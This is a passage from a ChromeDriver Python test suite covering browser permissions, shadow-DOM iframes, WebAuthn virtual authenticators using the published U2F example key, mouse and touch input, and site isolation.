'state': 'prompt'
}
self.assertRaises(chromedriver.InvalidArgument,
self._driver.SetPermission, parameters)
def testPermissionsSameOrigin(self):
""" Assures permissions are shared between same-domain windows. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
another_window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(another_window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
# Set permission.
parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'granted' }
# Test that they are present across the same domain.
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
self._driver.SwitchToWindow(window_handle)
self.CheckPermission(self.GetPermission('geolocation'), 'granted')
def testNewWindowSameDomainHasSamePermissions(self):
""" Assures permissions are shared between same-domain windows, even when
window is created after permissions are set. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.SetPermission({ 'descriptor': { 'name': 'geolocation' },
'state': 'denied' })
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
same_domain = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(same_domain)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
def testPermissionsSameOriginDoesNotAffectOthers(self):
""" Tests whether permissions set between two domains affect others. """
window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html'))
another_window_handle = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(another_window_handle)
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
different_domain = self._driver.NewWindow()['handle']
self._driver.SwitchToWindow(different_domain)
self._driver.Load('https://google.com')
self._driver.SetPermission({ 'descriptor': {'name': 'geolocation'},
'state': 'denied' })
# Switch back to a window on the original origin to set its permissions.
self._driver.SwitchToWindow(another_window_handle)
# Set permission.
parameters = { 'descriptor': { 'name': 'geolocation' }, 'state': 'prompt' }
# Test that they are present across the same domain.
self._driver.SetPermission(parameters)
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
self._driver.SwitchToWindow(window_handle)
self.CheckPermission(self.GetPermission('geolocation'), 'prompt')
# Assert different domain is not the same.
self._driver.SwitchToWindow(different_domain)
self.CheckPermission(self.GetPermission('geolocation'), 'denied')
# Tests that the webauthn capabilities are true on desktop and false on
# Android.
def testWebauthnVirtualAuthenticatorsCapability(self):
is_desktop = _ANDROID_PACKAGE_KEY is None
self.assertEqual(
is_desktop,
self._driver.capabilities['webauthn:virtualAuthenticators'])
self.assertEqual(
is_desktop,
self._driver.capabilities['webauthn:extension:largeBlob'])
def testCanClickInIframesInShadow(self):
"""Test that you can interact with a iframe within a shadow element.
See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445
"""
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_iframe.html'))
frame = self._driver.ExecuteScript(
'''return document.querySelector("#shadow")
.shadowRoot.querySelector("iframe")''')
self._driver.SwitchToFrame(frame)
message = self._driver.FindElement('css selector', '#message')
self.assertTrue('clicked' not in message.GetText())
button = self._driver.FindElement('tag name', 'button')
button.Click()
message = self._driver.FindElement('css selector', '#message.result')
self.assertTrue('clicked' in message.GetText())
def testCanClickInIframesInShadowScrolled(self):
"""Test that you can interact with a scrolled iframe
within a scrolled shadow DOM element.
See https://bugs.chromium.org/p/chromedriver/issues/detail?id=3445
"""
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_iframe.html'))
frame = self._driver.ExecuteScript(
'''return document.querySelector("#shadow_scroll")
.shadowRoot.querySelector("iframe")''')
self._driver.SwitchToFrame(frame)
message = self._driver.FindElement('css selector', '#message')
self.assertTrue('clicked' not in message.GetText())
button = self._driver.FindElement('tag name', 'button')
button.Click()
message = self._driver.FindElement('css selector', '#message.result')
self.assertTrue('clicked' in message.GetText())
class ChromeDriverBackgroundTest(ChromeDriverBaseTestWithWebServer):
def setUp(self):
self._driver1 = self.CreateDriver()
self._driver2 = self.CreateDriver()
def testBackgroundScreenshot(self):
self._driver2.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
self._driver1.Load(self._http_server.GetUrl('localhost')
+ '/chromedriver/empty.html')
screenshotPNGBase64 = self._driver1.TakeScreenshot()
self.assertIsNotNone(screenshotPNGBase64)
# Tests that require a secure context.
class ChromeDriverSecureContextTest(ChromeDriverBaseTestWithWebServer):
# The example attestation private key from the U2F spec at
# https://fidoalliance.org/specs/fido-u2f-v1.2-ps-20170411/fido-u2f-raw-message-formats-v1.2-ps-20170411.html#registration-example
# PKCS.8 encoded without encryption, as a base64url string.
privateKey = ("MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQg8_zMDQDYAxlU-Q"
"hk1Dwkf0v18GZca1DMF3SaJ9HPdmShRANCAASNYX5lyVCOZLzFZzrIKmeZ2jwU"
"RmgsJYxGP__fWN_S-j5sN4tT15XEpN_7QZnt14YvI6uvAgO0uJEboFaZlOEB")
@staticmethod
def GetHttpsUrlForFile(file_path, host=None):
return ChromeDriverSecureContextTest._https_server.GetUrl(
host) + file_path
# Encodes a string in URL-safe base64 with no padding.
@staticmethod
def URLSafeBase64Encode(string):
encoded = base64.urlsafe_b64encode(string)
while encoded[-1] == "=":
encoded = encoded[0:-1]
return encoded
# Decodes a URL-safe base64 string with no padding.
@staticmethod
def UrlSafeBase64Decode(string):
string = string.encode("utf-8")
if len(string) % 4 != 0:
string += "=" * (4 - len(string) % 4)
return base64.urlsafe_b64decode(string)
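# Padding math used by the two helpers above (illustrative): base64 encodes
# 3 input bytes as 4 output characters, so the unpadded length modulo 4 says
# how many '=' characters to re-add before decoding. For example, 'erina'
# (5 bytes) encodes to 'ZXJpbmE=' in standard base64; the helpers strip the
# trailing '=' on encode and restore it on decode.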
def setUp(self):
self._driver = self.CreateDriver(
accept_insecure_certs=True,
chrome_switches=['host-resolver-rules=MAP * 127.0.0.1',
'enable-experimental-web-platform-features'])
def testAddVirtualAuthenticator(self):
script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
requireResidentKey: true,
},
extensions: {
largeBlob: {
support: 'preferred',
},
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserConsenting = True,
isUserVerified = True,
extensions = ['largeBlob']
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(['usb'], result['credential']['transports'])
self.assertEquals(True, result['extensions']['largeBlob']['supported'])
def testAddVirtualAuthenticatorProtocolVersion(self):
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
for protocol in ['ctap1/u2f', 'ctap2', 'ctap2_1']:
authenticator_id = self._driver.AddVirtualAuthenticator(
protocol = protocol,
transport = 'usb',
)
self.assertTrue(len(authenticator_id) > 0)
self.assertRaisesRegexp(
chromedriver.UnsupportedOperation,
'INVALID is not a recognized protocol version',
self._driver.AddVirtualAuthenticator,
protocol = 'INVALID',
transport = 'usb')
def testAddVirtualBadExtensions(self):
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'extensions must be a list of strings',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = 'invalid')
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'extensions must be a list of strings',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = [42])
self.assertRaisesRegexp(
chromedriver.UnsupportedOperation,
'smolBlowbs is not a recognized extension',
self._driver.AddVirtualAuthenticator, protocol = 'ctap2', transport =
'usb', extensions = ['smolBlowbs'])
def testAddVirtualAuthenticatorDefaultParams(self):
script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
self._driver.AddVirtualAuthenticator(
protocol = 'ctap1/u2f',
transport = 'usb',
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(['usb'], result['credential']['transports'])
def testRemoveVirtualAuthenticator(self):
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
# Removing a non-existent virtual authenticator should fail.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'Could not find a Virtual Authenticator matching the ID',
self._driver.RemoveVirtualAuthenticator, 'id')
# Create an authenticator and try removing it.
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
self._driver.RemoveVirtualAuthenticator(authenticatorId)
# Trying to remove the same authenticator should fail.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'Could not find a Virtual Authenticator matching the ID',
self._driver.RemoveVirtualAuthenticator, authenticatorId)
def testAddCredential(self):
script = """
let done = arguments[0];
getCredential({
type: "public-key",
id: new TextEncoder().encode("cred-1"),
transports: ["usb"],
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
# Register a credential and try authenticating with it.
self._driver.AddCredential(
authenticatorId = authenticatorId,
credentialId = self.URLSafeBase64Encode("cred-1"),
isResidentCredential=False,
rpId="chromedriver.test",
privateKey=self.privateKey,
signCount=1,
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
def testAddCredentialLargeBlob(self):
script = """
let done = arguments[0];
getCredential({
type: "public-key",
id: new TextEncoder().encode("cred-1"),
transports: ["usb"],
}, {
extensions: {
largeBlob: {
read: true,
},
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserVerified = True,
extensions = ['largeBlob']
)
# Register a credential with a large blob and try reading it.
self._driver.AddCredential(
authenticatorId = authenticatorId,
credentialId = self.URLSafeBase64Encode('cred-1'),
userHandle = self.URLSafeBase64Encode('erina'),
largeBlob = self.URLSafeBase64Encode('large blob contents'),
isResidentCredential = True,
rpId = "chromedriver.test",
privateKey = self.privateKey,
signCount = 1,
)
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals('large blob contents', result['blob'])
def testAddCredentialBase64Errors(self):
# Test that AddCredential validates base64url-encoded parameters.
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = False,
hasUserVerification = False,
)
# Try adding a credentialId that is encoded in vanilla base64.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'credentialId must be a base64url encoded string',
self._driver.AddCredential, authenticatorId, '_0n+wWqg=',
False, "chromedriver.test", self.privateKey, None, 1,
)
# Try adding a credentialId that is not a string.
self.assertRaisesRegexp(
chromedriver.InvalidArgument,
'credentialId must be a base64url encoded string',
self._driver.AddCredential, authenticatorId, 1,
False, "chromedriver.test", self.privateKey, None, 1,
)
def testGetCredentials(self):
script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
requireResidentKey: true,
},
extensions: {
largeBlob: {
support: "required",
},
},
}).then(attestation =>
getCredential({
type: "public-key",
id: Uint8Array.from(attestation.credential.rawId),
transports: ["usb"],
}, {
extensions: {
largeBlob: {
write: new TextEncoder().encode("large blob contents"),
},
},
})).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2_1',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
isUserVerified = True,
extensions = ['largeBlob']
)
# Register a credential via the webauthn API and set a large blob on it.
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
self.assertEquals(True, result['extensions']['largeBlob']['written'])
credentialId = result['attestation']['id']
# GetCredentials should return the credential that was just created.
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(1, len(credentials))
self.assertEquals(credentialId, credentials[0]['credentialId'])
self.assertEquals(True, credentials[0]['isResidentCredential'])
self.assertEquals('chromedriver.test', credentials[0]['rpId'])
self.assertEquals(chr(1),
self.UrlSafeBase64Decode(credentials[0]['userHandle']))
self.assertEquals(2, credentials[0]['signCount'])
self.assertTrue(credentials[0]['privateKey'])
self.assertEquals('large blob contents',
self.UrlSafeBase64Decode(credentials[0]['largeBlob']))
def testRemoveCredential(self):
script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
)
# Register two credentials.
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
credential1Id = result['credential']['id']
result = self._driver.ExecuteAsyncScript(script)
self.assertEquals('OK', result['status'])
credential2Id = result['credential']['id']
# GetCredentials should return both credentials.
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(2, len(credentials))
# Removing the first credential should leave only the second one.
self._driver.RemoveCredential(authenticatorId, credential1Id)
credentials = self._driver.GetCredentials(authenticatorId)
self.assertEquals(1, len(credentials))
self.assertEquals(credential2Id, credentials[0]['credentialId'])
def testRemoveAllCredentials(self):
register_credential_script = """
let done = arguments[0];
registerCredential().then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
)
# Register a credential via the webauthn API.
result = self._driver.ExecuteAsyncScript(register_credential_script)
self.assertEquals('OK', result['status'])
credentialId = result['credential']['rawId']
# Attempting to register with the credential ID on excludeCredentials should
# fail.
exclude_credentials_script = """
let done = arguments[0];
registerCredential({
excludeCredentials: [{
type: "public-key",
id: Uint8Array.from(%s),
transports: ["usb"],
}],
}).then(done);
""" % (credentialId)
result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
self.assertEquals("InvalidStateError: The user attempted to register an "
"authenticator that contains one of the credentials "
"already registered with the relying party.",
result['status'])
# The registration should succeed after clearing the credentials.
self._driver.RemoveAllCredentials(authenticatorId)
result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
self.assertEquals('OK', result['status'])
def testSetUserVerified(self):
register_uv_script = """
let done = arguments[0];
registerCredential({
authenticatorSelection: {
userVerification: "required",
},
}).then(done);
"""
self._driver.Load(self.GetHttpsUrlForFile(
'/chromedriver/webauthn_test.html', 'chromedriver.test'))
authenticatorId = self._driver.AddVirtualAuthenticator(
protocol = 'ctap2',
transport = 'usb',
hasResidentKey = True,
hasUserVerification = True,
)
# Configure the virtual authenticator to fail user verification.
self._driver.SetUserVerified(authenticatorId, False)
# Attempting to register a credential with UV required should fail.
result = self._driver.ExecuteAsyncScript(register_uv_script)
self.assertTrue(result['status'].startswith("NotAllowedError"),
"Expected %s to be a NotAllowedError" % (result['status']))
# Trying again after setting userVerified to True should succeed.
self._driver.SetUserVerified(authenticatorId, True)
result = self._driver.ExecuteAsyncScript(register_uv_script)
self.assertEquals("OK", result['status'])
# Tests in the following class are expected to be moved to ChromeDriverTest
# class when we no longer support the legacy mode.
class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer):
"""W3C mode specific tests."""
def setUp(self):
self._driver = self.CreateDriver(
send_w3c_capability=True, send_w3c_request=True)
def testSendKeysToElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testSendKeysToElementDoesNotAppend(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
textControlTypes = ["text", "search", "tel", "url", "password"]
for textType in textControlTypes:
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<input type="{}" value="send_this_value">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.focus();'
'input.setSelectionRange(0,0);'
'return input;'.format(textType))
element.SendKeys('hello')
value = self._driver.ExecuteScript('return arguments[0].value;',
element)
self.assertEquals('hellosend_this_value', value)
def testSendKeysToEditableElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<p contentEditable="true"> <i>hello-></i> '
'<b>send_this_value </b> </p>\';'
'var input = document.getElementsByTagName("i")[0];'
'return input;')
element.SendKeys('hello')
self.assertEquals(u'hello->hello', element.GetText())
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/empty.html'))
element = self._driver.ExecuteScript(
'document.body.innerHTML = '
'\'<p contentEditable="true"> <i>hello</i> '
'<b>-></b> </p>\';'
'var input = document.getElementsByTagName("p")[0];'
'input.focus();'
'return input;')
element.SendKeys('hello')
self.assertEquals(u'hellohello ->', element.GetText())
def testUnexpectedAlertOpenExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.alert("Hi");')
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'{Alert text : Hi}',
self._driver.FindElement, 'tag name', 'divine')
# In W3C mode, the alert is dismissed by default.
self.assertFalse(self._driver.IsAlertOpen())
class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer):
"""End to end tests for ChromeDriver in Legacy mode."""
def setUp(self):
self._driver = self.CreateDriver(send_w3c_capability=False,
send_w3c_request=False)
def testContextMenuEventFired(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div'))
self._driver.MouseClick(2)
self.assertTrue(self._driver.ExecuteScript('return success'))
def testDragAndDropWithSVGImage(self):
self._driver.Load(
self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg'))
drag = self._driver.FindElement("css selector", "#GreenRectangle")
drop = self._driver.FindElement("css selector", "#FolderRectangle")
self._driver.MouseMoveTo(drag)
self._driver.MouseButtonDown()
self._driver.MouseMoveTo(drop)
self._driver.MouseButtonUp()
self.assertTrue(self._driver.IsAlertOpen())
self.assertEquals('GreenRectangle has been dropped into a folder.',
self._driver.GetAlertMessage())
self._driver.HandleAlert(True)
self.assertEquals('translate(300,55)', drag.GetAttribute("transform"))
def testMouseButtonDownAndUp(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mousedown", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new1<br>";'
'});'
'div.addEventListener("mouseup", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new2<a></a>";'
'});')
self._driver.MouseMoveTo(None, 50, 50)
self._driver.MouseButtonDown()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
self._driver.MouseButtonUp()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))
def testMouseClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("click", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div)
self._driver.MouseClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseDoubleClick(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("dblclick", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 1, 1)
self._driver.MouseDoubleClick()
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMouseMoveTo(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
div = self._driver.ExecuteScript(
'document.body.innerHTML = "<div>old</div>";'
'var div = document.getElementsByTagName("div")[0];'
'div.style["width"] = "100px";'
'div.style["height"] = "100px";'
'div.addEventListener("mouseover", function() {'
' var div = document.getElementsByTagName("div")[0];'
' div.innerHTML="new<br>";'
'});'
'return div;')
self._driver.MouseMoveTo(div, 10, 10)
self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
def testMoveToElementAndClick(self):
# This page gets rendered differently depending on which platform the test
# is running on, and what window size is being used. So we need to do some
# sanity checks to make sure that the <a> element is split across two lines
# of text.
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html'))
# Check that link element spans two lines and that the first ClientRect is
# above the second.
link = self._driver.FindElements('tag name', 'a')[0]
client_rects = self._driver.ExecuteScript(
'return arguments[0].getClientRects();', link)
self.assertEquals(2, len(client_rects))
self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top'])
# Check that the center of the link's bounding ClientRect is outside the
# element.
bounding_client_rect = self._driver.ExecuteScript(
'return arguments[0].getBoundingClientRect();', link)
center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2
self.assertTrue(client_rects[1]['right'] < center)
self.assertTrue(center < client_rects[0]['left'])
self._driver.MouseMoveTo(link)
self._driver.MouseClick()
self.assertTrue(self._driver.GetCurrentUrl().endswith('#top'))
def _FindElementInShadowDom(self, css_selectors):
"""Find an element inside shadow DOM using CSS selectors.
The last item in css_selectors identifies the element to find. All preceding
selectors identify the hierarchy of shadow hosts to traverse in order to
reach the target shadow DOM."""
current = None
for selector in css_selectors:
if current is None:
# First CSS selector, start from root DOM.
current = self._driver
else:
# current is a shadow host selected previously.
# Enter the corresponding shadow root.
current = self._driver.ExecuteScript(
'return arguments[0].shadowRoot', current)
current = current.FindElement('css selector', selector)
return current
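# Example traversal (matches shadow_dom_test.html used below): to reach the
# button nested two shadow roots deep, pass the host selectors first and the
# target last:
#   self._FindElementInShadowDom(["#innerDiv", "#parentDiv", "#button"])
# Each selector except the last resolves a shadow host; the helper then
# descends into its shadowRoot before applying the next selector.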
def testShadowDomDisplayed(self):
"""Checks that trying to manipulate shadow DOM elements that are detached
from the document raises a StaleElementReference exception"""
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/shadow_dom_test.html'))
elem = self._FindElementInShadowDom(
["#innerDiv", "#parentDiv", "#button"])
self.assertTrue(elem.IsDisplayed())
elem2 = self._driver.FindElement("css selector", "#hostContent")
self.assertTrue(elem2.IsDisplayed())
self._driver.ExecuteScript(
'document.querySelector("#outerDiv").style.display="None";')
self.assertFalse(elem.IsDisplayed())
def testSendingTabKeyMovesToNextInputElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
first = self._driver.FindElement('css selector', '#first')
second = self._driver.FindElement('css selector', '#second')
first.Click()
self._driver.SendKeys('snoopy')
self._driver.SendKeys(u'\uE004')
self._driver.SendKeys('prickly pete')
self.assertEquals('snoopy', self._driver.ExecuteScript(
'return arguments[0].value;', first))
self.assertEquals('prickly pete', self._driver.ExecuteScript(
'return arguments[0].value;', second))
def testSendingTabKeyMovesToNextInputElementEscapedTab(self):
"""This behavior is not specified by the WebDriver standard
but it is supported by us de facto.
According to this table https://www.w3.org/TR/webdriver/#keyboard-actions
the code point 0x09 (HT) must be sent to the browser via a CompositionEvent.
We, however, have historically been sending it as a KeyEvent
with code = ui::VKEY_TAB, which leads to a focus change.
By contrast, GeckoDriver and Firefox do not show this behavior.
If in the future it turns out that our current behavior is undesirable
we can remove this test.
"""
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
first = self._driver.FindElement('css selector', '#first')
second = self._driver.FindElement('css selector', '#second')
first.Click()
self._driver.SendKeys('snoopy\tprickly pete')
self.assertEquals('snoopy', first.GetProperty('value'))
self.assertEquals('prickly pete', second.GetProperty('value'))
def testMobileEmulationDisabledByDefault(self):
self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])
def testSendKeysToElement(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
text = self._driver.ExecuteScript(
'document.body.innerHTML = \'<input type="text">\';'
'var input = document.getElementsByTagName("input")[0];'
'input.addEventListener("change", function() {'
' document.body.appendChild(document.createElement("br"));'
'});'
'return input;')
text.SendKeys('0123456789+-*/ Hi')
text.SendKeys(', there!')
value = self._driver.ExecuteScript('return arguments[0].value;', text)
self.assertEquals('0123456789+-*/ Hi, there!', value)
def testUnexpectedAlertOpenExceptionMessage(self):
self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
self._driver.ExecuteScript('window.alert("Hi");')
self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
'unexpected alert open: {Alert text : Hi}',
self._driver.FindElement, 'tag name', 'divine')
def testTouchScrollElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
scroll_left = 'return document.documentElement.scrollLeft;'
scroll_top = 'return document.documentElement.scrollTop;'
self.assertEquals(0, self._driver.ExecuteScript(scroll_left))
self.assertEquals(0, self._driver.ExecuteScript(scroll_top))
target = self._driver.FindElement('css selector', '#target')
self._driver.TouchScroll(target, 47, 53)
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179
self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left), delta=1)
self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top), delta=1)
def testTouchDoubleTapElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.DoubleTap()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchend touchstart touchend',
events.GetText())
def testTouchLongPressElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.LongPress()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchcancel', events.GetText())
def testTouchSingleTapElement(self):
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/touch_action_tests.html'))
target = self._driver.FindElement('css selector', '#target')
target.SingleTap()
events = self._driver.FindElement('css selector', '#events')
self.assertEquals('events: touchstart touchend', events.GetText())
class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer):
"""Tests for ChromeDriver with the new Site Isolation Chrome feature.
This feature can be turned on using the --site-per-process flag.
In order to trick the test into thinking that we are on two separate origins,
the cross_domain_iframe.html code points to localhost instead of 127.0.0.1.
Note that Chrome does not allow "localhost" to be passed to --isolate-origins
for fixable technical reasons related to subdomain matching.
"""
def setUp(self):
self._driver = self.CreateDriver(chrome_switches=['--site-per-process'])
def testCanClickOOPIF(self):
"""Test that you can click into an Out of Process I-Frame (OOPIF).
Note that the Iframe will not be out-of-process if the correct
flags are not passed into Chrome.
"""
if util.GetPlatformName() == 'win':
# https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198
# This test is unreliable on Windows, as FindElement can be called too
# soon, before the child frame is fully loaded, causing an element-not-found
# error. Adding an implicit wait works around this issue.
self._driver.SetTimeouts({'implicit': 2000})
self._driver.Load(self.GetHttpUrlForFile(
'/chromedriver/cross_domain_iframe.html'))
frame = self._driver.FindElement('tag name', 'iframe')
self._driver.SwitchToFrame(frame)
self.assertTrue(self.WaitForCondition(
lambda: 'outer.html' in
self._driver.ExecuteScript('return window.location.href')))
self.assertTrue(self.WaitForCondition(
lambda: 'complete' ==
self._driver.ExecuteScript('return document.readyState')))
self._driver.SwitchToMainFrame()
a_outer = self._driver.FindElement('tag name', 'a')
a_outer.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#one'))
self._driver.SwitchToFrame(frame)
a_inner = self._driver.FindElement('tag name', 'a')
a_inner.Click()
frame_url = self._driver.ExecuteScript('return window.location.href')
self.assertTrue(frame_url.endswith('#two'))
class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer):
class _RequestHandler(object):
def __init__(self):
self.request_received_event = threading.Event()
self.send_response_event = threading.Event()
def handle(self, request):
self.request_received_event.set()
# Don't hang indefinitely; 10 seconds is enough.
self.send_response_event.wait(10)
self.send_response_event.clear()
return {'Cache-Control': 'no-store'}, 'Hi!'
def setUp(self):
self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler()
